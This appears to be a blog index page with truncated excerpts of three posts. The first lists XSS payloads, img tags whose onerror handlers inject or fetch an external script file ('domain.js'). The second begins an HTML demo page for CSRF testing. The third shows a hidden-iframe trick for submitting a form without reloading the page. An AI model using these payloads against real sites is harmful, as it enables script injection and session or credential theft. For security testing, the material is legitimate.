<img src=x onerror=with(document)body.appendChild(document.createElement(‘script’)).src=”domain.js”></img> <img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’domain.js'”></img> <img src=1 onerror=jQuery.getScript(“domain.js”)> <img src=”#” onerror=”$.getScript(‘domain.js’)”> <img src=”#” onerror=”var a=String.fromCharCode(47);$.g […]
HTML
关于CSRF测试的HTML-demo页面
<!DOCTYPE html> <html> <body> <head> <meta charset=”utf-8″> </head> <form action=”” method=”GET” target=”id_iframe”> 请输入订单:</br> <input type=”text” id=”order_number”></input> </form> <br> <button id=”but”>提交</button> <script> […]
html提交请求不跳转页面简单方法(非ajax)
html提交请求不跳转页面简单方法(非ajax),点击清空按钮后刷新当前页面 <html> <body> <form action=”./del.php” method=”post” target=”id_iframe”> <input type=”submit” value=”清空” onclick=”location.reload()”/> </form> <iframe name=”id_iframe” style=”display:none;”></iframe> </body> &l […]